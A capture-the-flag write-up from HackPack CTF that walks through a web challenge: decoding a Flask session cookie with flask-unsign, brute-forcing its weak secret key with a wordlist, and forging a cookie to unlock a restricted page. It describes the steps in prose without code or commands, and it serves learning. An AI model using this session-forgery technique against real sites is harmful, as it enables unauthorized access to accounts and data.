This is a challenge I found interesting from HackPack CTF (hosted by student club at NCSU). It’s a web challenge so we get a link and a hint:
I wonder if they will sell you a Flask of milk to go with your cookies..
Cool, the challenge is called cookie forge so it probably has to do with web cookies.
If we go to the link we are greeted with a page about cookies. After navigating the website for a bit we can see there’s a few pages of interest. A ‘Flagship loyalty’ page and a login page. If we go to the flagship loyalty page it asks us to log in. Interestingly enough, the login page lets you log in with any credentials:
Whats more interesting though is what happens after you log in:
Before logging in we had no cookies but now have a cookie called ‘session’! A step forward, but unfortunately we still can’t access the Flagship Loyalty page:
Here’s where the hint comes in handy. There’s a python framework used to build web applications called flask. After doing some research on how flask handles session cookies, we discover that flask uses a secret key to create the session cookies however the cookie itself is just base64 encoded.
The cookie contains the actual session data and parameters, a timestamp, and a hash to ensure that its a valid cookie created with the secret key.
So what do we do in this case? Well first lets find the contents of our session cookie. Again these are just base64 encoded so you could just use a web service or a script but I’m going to use a tool called ‘flask-unsign’ which was created for dealing with Flask application session cookies.
After inputting the cookie we can see that it contains the parameters ‘flagship’ and ‘username’ and in our case flagship is set to False. This would explain why we can’t access the Flagship Loyalty page even though we are logged on.
In a perfect world we would be able to just change ‘flagship’:False to ‘flagship’:True then just base64 encode it and upload the new cookie. But its not that easy, as stated before Flask session cookies contain a hash at the end using a secret key to prevent this.
Lucky for us, there’s another attack vector that we can take: we can attempt to bruteforce the secret key with a wordlist. So let’s use flask-unsign again:
And bam! We found our secret key: “password1”
In this case I didn’t specify a wordlist so that flask-unsign uses it’s default wordlist but you could use something like rockyou or any other wordlist.
Now that we have the secret key we can forge a cookie that will give us access to the Flagship Loyalty page. Again with flask-unsign we set our parameters and add the secret key to create the cookie:
And now we have the new forged cookie. We can now replace our existing session cookie data with this and it should read ‘flagship’:True giving us access to the page.
Now that we replaced it, save the cookie, and we can now access the Flagship Loyalty page giving us the flag:
A pretty cool challenge if you ask me, also here’s some resources that I found when researching and the github page for flask-unsign:
Defeating Flask’s Session Management
A few weeks back, I and a friend of mine were discussing web frameworks and how he claimed to have made an ‘Impossible…